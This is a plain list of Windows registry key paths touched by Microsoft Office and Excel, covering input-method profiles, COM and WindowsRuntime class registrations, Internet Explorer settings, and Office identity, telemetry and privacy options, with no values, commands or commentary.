HKEY_LOCAL_MACHINE\Software\Microsoft\CTF\TIP\{81EA0A17-AA39-455B-BA20-EA79A8F98966}\LanguageProfile\0x0000044B\{0F420707-90F7-4E1B-B9F2-91FF3CA9D990}\Enable
HKEY_LOCAL_MACHINE\Software\Microsoft\CTF\TIP\{81EA0A17-AA39-455B-BA20-EA79A8F98966}\LanguageProfile\0x0000044C\{6346F0DC-2FE4-40E6-99D5-7362723C3780}\Enable
HKEY_LOCAL_MACHINE\Software\Microsoft\CTF\TIP\{81EA0A17-AA39-455B-BA20-EA79A8F98966}\LanguageProfile\0x0000044E\{DBEB227A-4EF6-45A6-85B5-B1A03D95BB66}\Enable
HKEY_LOCAL_MACHINE\Software\Microsoft\CTF\TIP\{81EA0A17-AA39-455B-BA20-EA79A8F98966}\LanguageProfile\0x00000461\{7912A487-286C-4825-A608-F676C630B733}\Enable
HKEY_LOCAL_MACHINE\Software\Microsoft\CTF\TIP\{81EA0A17-AA39-455B-BA20-EA79A8F98966}\LanguageProfile\0x00000849\{02E8FC61-6A42-4749-8124-68E28105C20E}\Enable
HKEY_LOCAL_MACHINE\Software\Microsoft\CTF\TIP\{8613E14C-D0C0-4161-AC0F-1DD2563286BC}\LanguageProfile\0x0000ffff\{B37D4237-8D1A-412E-9026-538FE16DF216}\Enable
HKEY_LOCAL_MACHINE\Software\Microsoft\CTF\TIP\{a028ae76-01b1-46c2-99c4-acd9858ae02f}\LanguageProfile\0x00000412\{B5FE1F02-D5F2-4445-9C03-C568F23C99A1}\Enable
HKEY_LOCAL_MACHINE\Software\Microsoft\CTF\TIP\{a1e2b86b-924a-4d43-80f6-8a820df7190f}\LanguageProfile\0x00000412\{b60af051-257a-46bc-b9d3-84dad819bafb}\Enable
HKEY_LOCAL_MACHINE\Software\Microsoft\CTF\TIP\{B115690A-EA02-48D5-A231-E3578D2FDF80}\LanguageProfile\0x00000404\{B2F9C502-1742-11D4-9790-0080C882687E}\Enable
HKEY_LOCAL_MACHINE\Software\Microsoft\CTF\TIP\{C2CB2CF0-AF47-413E-9780-8BC3A3C16068}\LanguageProfile\0x0000042a\{591AE943-56BE-48F6-8966-06B43915CC5A}\Enable
HKEY_LOCAL_MACHINE\Software\Microsoft\CTF\TIP\{C2CB2CF0-AF47-413E-9780-8BC3A3C16068}\LanguageProfile\0x0000042a\{5FB02EC5-0A77-4684-B4FA-DEF8A2195628}\Enable
HKEY_LOCAL_MACHINE\Software\Microsoft\CTF\TIP\{DCBD6FA8-032F-11D3-B5B1-00C04FC324A1}\LanguageProfile\0x0000ffff\{6A114E62-E11B-447F-9A58-2D354F5C9204}\Enable
HKEY_LOCAL_MACHINE\Software\Microsoft\CTF\TIP\{E429B25A-E5D3-4D1F-9BE3-0C608477E3A1}\LanguageProfile\0x00000404\{037B2C25-480C-4D7F-B027-D6CA6B69788A}\Enable
HKEY_LOCAL_MACHINE\Software\Microsoft\CTF\TIP\{E429B25A-E5D3-4D1F-9BE3-0C608477E3A1}\LanguageProfile\0x00000404\{D38EFF65-AA46-4FD5-91A7-67845FB02F5B}\Enable
HKEY_LOCAL_MACHINE\Software\Microsoft\CTF\TIP\{E429B25A-E5D3-4D1F-9BE3-0C608477E3A1}\LanguageProfile\0x00000473\{3CAB88B7-CC3E-46A6-9765-B772AD7761FF}\Enable
HKEY_LOCAL_MACHINE\Software\Microsoft\CTF\TIP\{E429B25A-E5D3-4D1F-9BE3-0C608477E3A1}\LanguageProfile\0x00000478\{409C8376-007B-4357-AE8E-26316EE3FB0D}\Enable
HKEY_LOCAL_MACHINE\Software\Microsoft\CTF\TIP\{F25E9F57-2FC8-4EB3-A41A-CCE5F08541E6}\LanguageProfile\0x0000FFFF\{F2510000-2FC8-4EB3-A41A-CCE5F08541E6}\Enable
HKEY_LOCAL_MACHINE\Software\Microsoft\CTF\TIP\{FA445657-9379-11D6-B41A-00065B83EE53}\LanguageProfile\0x0000FFFF\{38445657-9381-11D6-B41A-00065B83EE53}\Enable
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\General\UseOfficeUIFont
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\16.0\Excel\Options\AirspaceDisable
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Excel\FontInfoCache
HKEY_CURRENT_USER\Software\Microsoft\Office\Common\ClientTelemetry\DisableTelemetry
HKEY_CURRENT_USER\Software\Microsoft\Office\Common\ClientTelemetry\EnableWriteTelemetryEventsToNexus
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\Identity\DisableOneAuth
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\Identity\EnableExchangeOnPremModernAuth
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\Identity\DisableAuthentication
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\Identity\EnableADAL
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Office\ClickToRun\REGISTRY\MACHINE\Software\Wow6432Node\Microsoft\IdentityCRL\ServiceEnvironment
HKEY_LOCAL_MACHINE\Software\Wow6432Node\Microsoft\IdentityCRL\ServiceEnvironment
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\ScriptRun\IdentityRun
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\Identity\Canary
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\Identity\Version
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\Identity\NoDomainUser
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\Identity\FederationSignInName
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\Identity\FederationProvider
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\Identity\FederationConfigError
HKEY_LOCAL_MACHINE\Software\Microsoft\COM3\Com+Enabled
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\Identity\SignedOutOneAuthMigrationComplete
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\Identity\ServiceAuthInfoCache\CredStoreKeyToAuthScheme\https://odc.officeapps.live.com
HKEY_LOCAL_MACHINE\Software\Classes\Wow6432Node\CLSID\{DCB00C01-570F-4A9B-8D69-199FDBA5723B}\ActivateOnHostFlags
HKEY_LOCAL_MACHINE\Software\Classes\Wow6432Node\CLSID\{DCB00C01-570F-4A9B-8D69-199FDBA5723B}\(Default)
HKEY_LOCAL_MACHINE\Software\Classes\Wow6432Node\CLSID\{DCB00C01-570F-4A9B-8D69-199FDBA5723B}\InprocServer32\(Default)
HKEY_LOCAL_MACHINE\Software\Classes\Wow6432Node\CLSID\{DCB00C01-570F-4A9B-8D69-199FDBA5723B}\InprocServer32\ThreadingModel
HKEY_LOCAL_MACHINE\Software\Classes\Wow6432Node\CLSID\{DCB00C01-570F-4A9B-8D69-199FDBA5723B}\AppID
HKEY_LOCAL_MACHINE\Software\Classes\Wow6432Node\CLSID\{DCB00C01-570F-4A9B-8D69-199FDBA5723B}\InProcServer32\(Default)
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\Internet\msoridShouldUseReauthRequestProxy
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\Internet\SpoAuthenticatorHeaderEnabled
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\Internet\IsOnRequestCompletedActivityEnabled
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\Identity\OneAuthConfigCache\MsaAppId
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\Identity\OneAuthConfigCache\MsaLoginEndUrl
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\Identity\OneAuthConfigCache\MsaSignInScope
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\Identity\OneAuthConfigCache\AadClientId
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\AppUserIdleTimerInterval
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\AppUserIdleResetInterval
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\Identity\OneAuthConfigCache\AadRedirectUri
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\Identity\OneAuthConfigCache\AadResourceId
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\Identity\ConnectedOneAuthAccountId
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\FontCache\Parameters\ClientCacheSize
HKEY_LOCAL_MACHINE\Software\Microsoft\WindowsRuntime\ActivatableClassId\Windows.Security.Authentication.Web.Core.WebAuthenticationCoreManager\ActivationType
HKEY_LOCAL_MACHINE\Software\Microsoft\WindowsRuntime\ActivatableClassId\Windows.Security.Authentication.Web.Core.WebAuthenticationCoreManager\Server
HKEY_LOCAL_MACHINE\Software\Microsoft\WindowsRuntime\ActivatableClassId\Windows.Security.Authentication.Web.Core.WebAuthenticationCoreManager\DllPath
HKEY_LOCAL_MACHINE\Software\Microsoft\WindowsRuntime\ActivatableClassId\Windows.Security.Authentication.Web.Core.WebAuthenticationCoreManager\Threading
HKEY_LOCAL_MACHINE\Software\Microsoft\WindowsRuntime\ActivatableClassId\Windows.Security.Authentication.Web.Core.WebAuthenticationCoreManager\TrustLevel
HKEY_LOCAL_MACHINE\Software\Microsoft\WindowsRuntime\ActivatableClassId\Windows.Security.Authentication.Web.Core.WebAuthenticationCoreManager\RemoteServer
HKEY_LOCAL_MACHINE\Software\Microsoft\WindowsRuntime\ActivatableClassId\Windows.Security.Authentication.Web.Core.WebAuthenticationCoreManager\ActivateAsUser
HKEY_LOCAL_MACHINE\Software\Microsoft\WindowsRuntime\ActivatableClassId\Windows.Security.Authentication.Web.Core.WebAuthenticationCoreManager\ActivateInSharedBroker
HKEY_LOCAL_MACHINE\Software\Microsoft\WindowsRuntime\ActivatableClassId\Windows.Security.Authentication.Web.Core.WebAuthenticationCoreManager\ActivateInBrokerForMediumILContainer
HKEY_LOCAL_MACHINE\Software\Microsoft\WindowsRuntime\ActivatableClassId\Windows.Security.Authentication.Web.Core.WebAuthenticationCoreManager\Permissions
HKEY_LOCAL_MACHINE\Software\Microsoft\WindowsRuntime\ActivatableClassId\Windows.Security.Authentication.Web.Core.WebAuthenticationCoreManager\ActivateOnHostFlags
HKEY_LOCAL_MACHINE\Software\Wow6432Node\Microsoft\.NETFramework\InstallRoot
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Session Manager\ResourcePolicies
HKEY_LOCAL_MACHINE\Software\Wow6432Node\Microsoft\.NETFramework\UseLegacyV2RuntimeActivationPolicyDefaultValue
HKEY_LOCAL_MACHINE\Software\Wow6432Node\Microsoft\.NETFramework\OnlyUseLatestCLR
HKEY_LOCAL_MACHINE\Software\Wow6432Node\Microsoft\.NETFramework\ErrorDialog
HKEY_LOCAL_MACHINE\Software\Wow6432Node\Microsoft\.NETFramework\Fod
HKEY_LOCAL_MACHINE\Software\Wow6432Node\Microsoft\.NETFramework\FodConservativeMode
HKEY_CURRENT_USER\Software\Microsoft\Office\Common\Security\AutomationSecurity
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\Research\Translation\CurrentProvider
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\Research\Translation\MaxWords
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\Research\Translation\MaxWordsJapan
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\Research\Translation\UseOnline
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\Research\Translation\PreferOffline
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\Research\Translation\UseMT
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\Internet\UseOnlineContent
HKEY_LOCAL_MACHINE\Software\Microsoft\WindowsRuntime\ActivatableClassId\Windows.Foundation.Uri\RemoteServer
HKEY_LOCAL_MACHINE\Software\Microsoft\WindowsRuntime\ActivatableClassId\Windows.Foundation.Uri\ActivateInSharedBroker
HKEY_LOCAL_MACHINE\Software\Microsoft\WindowsRuntime\ActivatableClassId\Windows.Foundation.Uri\ActivateInBrokerForMediumILContainer
HKEY_LOCAL_MACHINE\Software\Microsoft\WindowsRuntime\ActivatableClassId\Windows.Foundation.Diagnostics.AsyncCausalityTracer\DllPath
HKEY_LOCAL_MACHINE\Software\Microsoft\WindowsRuntime\ActivatableClassId\Windows.Foundation.Uri\ActivateOnHostFlags
HKEY_LOCAL_MACHINE\Software\Microsoft\WindowsRuntime\ActivatableClassId\Windows.Foundation.Uri\TrustLevel
HKEY_LOCAL_MACHINE\Software\Microsoft\WindowsRuntime\ActivatableClassId\Windows.Foundation.Uri\ActivateAsUser
HKEY_LOCAL_MACHINE\Software\Microsoft\WindowsRuntime\ActivatableClassId\Windows.Foundation.Uri\Permissions
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\General\EnablePhoneOnlyAuth
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\Internet\ConfigEnvironment
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\Internet\WebServiceCache\AllUsers\officeclient.microsoft.com\config16--lcid=1033&syslcid=1033&uilcid=1033&build=16.0.17029&crev=3\0\Url
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\Internet\WebServiceCache\AllUsers\officeclient.microsoft.com\config16--lcid=1033&syslcid=1033&uilcid=1033&build=16.0.17029&crev=3\0\Properties
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\Internet\WebServiceCache\AllUsers\officeclient.microsoft.com\config16--lcid=1033&syslcid=1033&uilcid=1033&build=16.0.17029&crev=3\0\EndDate
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\Internet\WebServiceCache\AllUsers\officeclient.microsoft.com\config16--lcid=1033&syslcid=1033&uilcid=1033&build=16.0.17029&crev=3\0\StartDate
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\Internet\WebServiceCache\AllUsers\officeclient.microsoft.com\config16--lcid=1033&syslcid=1033&uilcid=1033&build=16.0.17029&crev=3\0\FilePath
HKEY_CURRENT_USER\Software\Microsoft\Office\Common\ClientTelemetry\TelemetryClientId
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\Internet\WebServiceCache\Session
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\SessionId
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\Identity\EnableOfficeBetaHeader
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\Internet\EnableHttpAccessTypeAutomaticProxy
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\Internet\DisableConnectionReuse
HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main\FrameTabWindow
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Office\ClickToRun\REGISTRY\MACHINE\Software\Wow6432Node\Microsoft\Internet Explorer\Main\(Default)
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Office\ClickToRun\REGISTRY\MACHINE\Software\Wow6432Node\Microsoft\Internet Explorer\Main\FrameTabWindow
HKEY_LOCAL_MACHINE\Software\Wow6432Node\Microsoft\Internet Explorer\Main\FrameTabWindow
HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main\FrameMerging
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Office\ClickToRun\REGISTRY\MACHINE\Software\Wow6432Node\Microsoft\Internet Explorer\Main\FrameMerging
HKEY_LOCAL_MACHINE\Software\Wow6432Node\Microsoft\Internet Explorer\Main\FrameMerging
HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main\SessionMerging
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Office\ClickToRun\REGISTRY\MACHINE\Software\Wow6432Node\Microsoft\Internet Explorer\Main\SessionMerging
HKEY_LOCAL_MACHINE\Software\Wow6432Node\Microsoft\Internet Explorer\Main\SessionMerging
HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main\AdminTabProcs
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Office\ClickToRun\REGISTRY\MACHINE\Software\Wow6432Node\Microsoft\Internet Explorer\Main\AdminTabProcs
HKEY_LOCAL_MACHINE\Software\Wow6432Node\Microsoft\Internet Explorer\Main\AdminTabProcs
HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Security\RunBinaryControlHostProcessInSeparateAppContainer
HKEY_LOCAL_MACHINE\Software\Wow6432Node\Microsoft\Internet Explorer\Security\RunBinaryControlHostProcessInSeparateAppContainer
HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main\TabProcGrowth
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Office\ClickToRun\REGISTRY\MACHINE\Software\Wow6432Node\Microsoft\Internet Explorer\Main\TabProcGrowth
HKEY_LOCAL_MACHINE\Software\Wow6432Node\Microsoft\Internet Explorer\Main\TabProcGrowth
HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\CurrentVersion\Internet Settings\CreateUriCacheSize
HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\CurrentVersion\Internet Settings\CreateUriCacheSize
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\CreateUriCacheSize
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Office\ClickToRun\REGISTRY\MACHINE\Software\Wow6432Node\Microsoft\Windows\CurrentVersion\Internet Settings\(Default)
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Office\ClickToRun\REGISTRY\MACHINE\Software\Wow6432Node\Microsoft\Windows\CurrentVersion\Internet Settings\CreateUriCacheSize
HKEY_LOCAL_MACHINE\Software\Wow6432Node\Microsoft\Windows\CurrentVersion\Internet Settings\CreateUriCacheSize
HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\CurrentVersion\Internet Settings\EnablePunycode
HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\CurrentVersion\Internet Settings\EnablePunycode
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\EnablePunycode
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Office\ClickToRun\REGISTRY\MACHINE\Software\Wow6432Node\Microsoft\Windows\CurrentVersion\Internet Settings\EnablePunycode
HKEY_LOCAL_MACHINE\Software\Wow6432Node\Microsoft\Windows\CurrentVersion\Internet Settings\EnablePunycode
HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\CurrentVersion\Internet Settings\Security_HKLM_only
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Office\ClickToRun\REGISTRY\MACHINE\Software\Wow6432Node\Microsoft\Internet Explorer\Main\FeatureControl\(Default)
HKEY_LOCAL_MACHINE\Software\Classes\Wow6432Node\Interface\{E60E20A2-87A0-4B34-8502-EE3B8FB4EC16}\ProxyStubClsid32\(Default)
HKEY_LOCAL_MACHINE\Software\Classes\Wow6432Node\CLSID\{A6FF50C0-56C0-71CA-5732-BED303A59628}\ActivateOnHostFlags
HKEY_LOCAL_MACHINE\Software\Classes\Wow6432Node\CLSID\{A6FF50C0-56C0-71CA-5732-BED303A59628}\(Default)
HKEY_LOCAL_MACHINE\Software\Classes\Wow6432Node\CLSID\{A6FF50C0-56C0-71CA-5732-BED303A59628}\InprocServer32\(Default)
HKEY_LOCAL_MACHINE\Software\Classes\Wow6432Node\CLSID\{A6FF50C0-56C0-71CA-5732-BED303A59628}\InprocServer32\ThreadingModel
HKEY_LOCAL_MACHINE\Software\Classes\Wow6432Node\CLSID\{A6FF50C0-56C0-71CA-5732-BED303A59628}\AppID
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\ClientTelemetry\RulesXmlDir
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\ClientTelemetry\RulesLastModified\excel.exe_queried
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\ClientTelemetry\RulesLastModified\excel.exe_expiration
HKEY_CURRENT_USER\Software\Microsoft\Office\Common\ClientTelemetry\EnableWriteRulesResultToAsimov
HKEY_CURRENT_USER\Software\Microsoft\Office\Common\ClientTelemetry\EnableWriteRulesResultToFile
HKEY_CURRENT_USER\Software\Microsoft\Office\Common\ClientTelemetry\ULSQueueAbortThreshold
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\ExperimentConfigs\Ecs\excel\DeferredConfigs
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\TrustCenter\Experimentation\DisableFeatureRollout
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\Experiment\excel\BuildNumber
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\Experiment\excel\EcsRequestPending
HKEY_CURRENT_USER\Software\Microsoft\Office\Common\ClientTelemetry\Sampling\ClientSamplingOverride
HKEY_CURRENT_USER\Software\Microsoft\Office\Common\ClientTelemetry\EnableTelemetryGrf
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\Internet\DisableServerReachability
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\Roaming\SchemaVersion
HKEY_LOCAL_MACHINE\Software\Classes\Wow6432Node\CLSID\{4590F811-1D3A-11D0-891F-00AA004B2E24}\ActivateOnHostFlags
HKEY_LOCAL_MACHINE\Software\Classes\Wow6432Node\CLSID\{4590F811-1D3A-11D0-891F-00AA004B2E24}\(Default)
HKEY_LOCAL_MACHINE\Software\Classes\Wow6432Node\CLSID\{4590F811-1D3A-11D0-891F-00AA004B2E24}\InprocServer32\(Default)
HKEY_LOCAL_MACHINE\Software\Classes\Wow6432Node\CLSID\{4590F811-1D3A-11D0-891F-00AA004B2E24}\InprocServer32\ThreadingModel
HKEY_LOCAL_MACHINE\Software\Classes\Wow6432Node\CLSID\{4590F811-1D3A-11D0-891F-00AA004B2E24}\AppID
HKEY_LOCAL_MACHINE\Software\Classes\Wow6432Node\Interface\{63A0A1E5-F8FE-4BA6-8508-CAEF1277DD35}\ProxyStubClsid32\(Default)
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\Licensing\RetailDemo
HKEY_LOCAL_MACHINE\Software\Microsoft\WindowsRuntime\ActivatableClassId\Windows.Internal.Security.Credentials.WebAccountProviderInternal\ActivationType
HKEY_LOCAL_MACHINE\Software\Microsoft\WindowsRuntime\ActivatableClassId\Windows.Internal.Security.Credentials.WebAccountProviderInternal\Server
HKEY_LOCAL_MACHINE\Software\Microsoft\WindowsRuntime\ActivatableClassId\Windows.Internal.Security.Credentials.WebAccountProviderInternal\DllPath
HKEY_LOCAL_MACHINE\Software\Microsoft\WindowsRuntime\ActivatableClassId\Windows.Internal.Security.Credentials.WebAccountProviderInternal\TrustLevel
HKEY_LOCAL_MACHINE\Software\Microsoft\WindowsRuntime\ActivatableClassId\Windows.Internal.Security.Credentials.WebAccountProviderInternal\RemoteServer
HKEY_LOCAL_MACHINE\Software\Microsoft\WindowsRuntime\ActivatableClassId\Windows.Internal.Security.Credentials.WebAccountProviderInternal\ActivateAsUser
HKEY_LOCAL_MACHINE\Software\Microsoft\WindowsRuntime\ActivatableClassId\Windows.Internal.Security.Credentials.WebAccountProviderInternal\ActivateInSharedBroker
HKEY_LOCAL_MACHINE\Software\Microsoft\WindowsRuntime\ActivatableClassId\Windows.Internal.Security.Credentials.WebAccountProviderInternal\ActivateInBrokerForMediumILContainer
HKEY_LOCAL_MACHINE\Software\Microsoft\WindowsRuntime\ActivatableClassId\Windows.Internal.Security.Credentials.WebAccountProviderInternal\Permissions
HKEY_LOCAL_MACHINE\Software\Microsoft\WindowsRuntime\ActivatableClassId\Windows.Internal.Security.Credentials.WebAccountProviderInternal\ActivateOnHostFlags
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Excel\Options\LastUILang
HKEY_CURRENT_USER\Software\Microsoft\Shared\OfficeUILanguage
HKEY_CURRENT_USER\Software\Microsoft\Office\Common\ClientTelemetry\SendTelemetry
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\Privacy\SettingsStore\Anonymous\FRESettingsMigrated
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\Privacy\ControllerConnectedServicesEnabled
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\Privacy\SettingsStore\Anonymous\ControllerConnectedServicesStateTime
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\Privacy\SendTelemetryTime
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\Privacy\SettingsStore\Anonymous\DisconnectedState
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\Privacy\UserContentDisabled
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\Privacy\DownloadContentDisabled
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\Privacy\SettingsStore\Anonymous\RequiredDiagnosticDataNoticeVersion
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\Privacy\SettingsStore\Anonymous\OptionalDiagnosticDataConsentVersion
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\Privacy\SettingsStore\Anonymous\ConnectedExperiencesNoticeVersion
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\Privacy\SettingsStore\Anonymous\OptionalConnectedExperiencesNoticeVersion
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\Privacy\SettingsStore\Anonymous\RoamingNotificationState
HKEY_LOCAL_MACHINE\Software\Wow6432Node\Microsoft\Office\16.0\Common\COM Compatibility\{00000327-0000-0000-C000-000000000046}\ActivationFilterOverride
HKEY_LOCAL_MACHINE\Software\Wow6432Node\Microsoft\Office\16.0\Common\COM Compatibility\{00000327-0000-0000-C000-000000000046}\AlternateCLSID
HKEY_LOCAL_MACHINE\Software\Wow6432Node\Microsoft\Office\16.0\Common\COM Compatibility\{00000327-0000-0000-C000-000000000046}\ScopedActivationOLEActiveXOverride
HKEY_LOCAL_MACHINE\Software\Wow6432Node\Microsoft\Office\16.0\Common\COM Compatibility\{00000327-0000-0000-C000-000000000046}\ScopedActivationOLEJSOverride
HKEY_LOCAL_MACHINE\Software\Wow6432Node\Microsoft\Office\16.0\Common\COM Compatibility\{00024512-0000-0000-C000-000000000046}\ActivationFilterOverride
HKEY_LOCAL_MACHINE\Software\Wow6432Node\Microsoft\Office\16.0\Common\COM Compatibility\{00024512-0000-0000-C000-000000000046}\AlternateCLSID
HKEY_LOCAL_MACHINE\Software\Wow6432Node\Microsoft\Office\16.0\Common\COM Compatibility\{00024512-0000-0000-C000-000000000046}\ScopedActivationOLEActiveXOverride
HKEY_LOCAL_MACHINE\Software\Wow6432Node\Microsoft\Office\16.0\Common\COM Compatibility\{00024512-0000-0000-C000-000000000046}\ScopedActivationOLEJSOverride
HKEY_LOCAL_MACHINE\Software\Wow6432Node\Microsoft\Office\16.0\Common\COM Compatibility\{06290BD0-48AA-11D2-8432-006008C3FBFC}\ActivationFilterOverride
HKEY_LOCAL_MACHINE\Software\Wow6432Node\Microsoft\Office\16.0\Common\COM Compatibility\{06290BD0-48AA-11D2-8432-006008C3FBFC}\AlternateCLSID
HKEY_LOCAL_MACHINE\Software\Wow6432Node\Microsoft\Office\16.0\Common\COM Compatibility\{06290BD0-48AA-11D2-8432-006008C3FBFC}\ScopedActivationOLEActiveXOverride
HKEY_LOCAL_MACHINE\Software\Wow6432Node\Microsoft\Office\16.0\Common\COM Compatibility\{06290BD0-48AA-11D2-8432-006008C3FBFC}\ScopedActivationOLEJSOverride
HKEY_LOCAL_MACHINE\Software\Wow6432Node\Microsoft\Office\16.0\Common\COM Compatibility\{06290BD1-48AA-11D2-8432-006008C3FBFC}\ActivationFilterOverride
HKEY_LOCAL_MACHINE\Software\Wow6432Node\Microsoft\Office\16.0\Common\COM Compatibility\{06290BD1-48AA-11D2-8432-006008C3FBFC}\AlternateCLSID
HKEY_LOCAL_MACHINE\Software\Wow6432Node\Microsoft\Office\16.0\Common\COM Compatibility\{06290BD1-48AA-11D2-8432-006008C3FBFC}\ScopedActivationOLEActiveXOverride
HKEY_LOCAL_MACHINE\Software\Wow6432Node\Microsoft\Office\16.0\Common\COM Compatibility\{06290BD1-48AA-11D2-8432-006008C3FBFC}\ScopedActivationOLEJSOverride
HKEY_LOCAL_MACHINE\Software\Wow6432Node\Microsoft\Office\16.0\Common\COM Compatibility\{06290BD2-48AA-11D2-8432-006008C3FBFC}\ActivationFilterOverride
HKEY_LOCAL_MACHINE\Software\Wow6432Node\Microsoft\Office\16.0\Common\COM Compatibility\{06290BD2-48AA-11D2-8432-006008C3FBFC}\AlternateCLSID
HKEY_LOCAL_MACHINE\Software\Wow6432Node\Microsoft\Office\16.0\Common\COM Compatibility\{06290BD2-48AA-11D2-8432-006008C3FBFC}\ScopedActivationOLEActiveXOverride
HKEY_LOCAL_MACHINE\Software\Wow6432Node\Microsoft\Office\16.0\Common\COM Compatibility\{06290BD2-48AA-11D2-8432-006008C3FBFC}\ScopedActivationOLEJSOverride
HKEY_LOCAL_MACHINE\Software\Wow6432Node\Microsoft\Office\16.0\Common\COM Compatibility\{06290BD3-48AA-11D2-8432-006008C3FBFC}\ActivationFilterOverride
HKEY_LOCAL_MACHINE\Software\Wow6432Node\Microsoft\Office\16.0\Common\COM Compatibility\{06290BD3-48AA-11D2-8432-006008C3FBFC}\AlternateCLSID
HKEY_LOCAL_MACHINE\Software\Wow6432Node\Microsoft\Office\16.0\Common\COM Compatibility\{06290BD3-48AA-11D2-8432-006008C3FBFC}\ScopedActivationOLEActiveXOverride
HKEY_LOCAL_MACHINE\Software\Wow6432Node\Microsoft\Office\16.0\Common\COM Compatibility\{06290BD3-48AA-11D2-8432-006008C3FBFC}\ScopedActivationOLEJSOverride
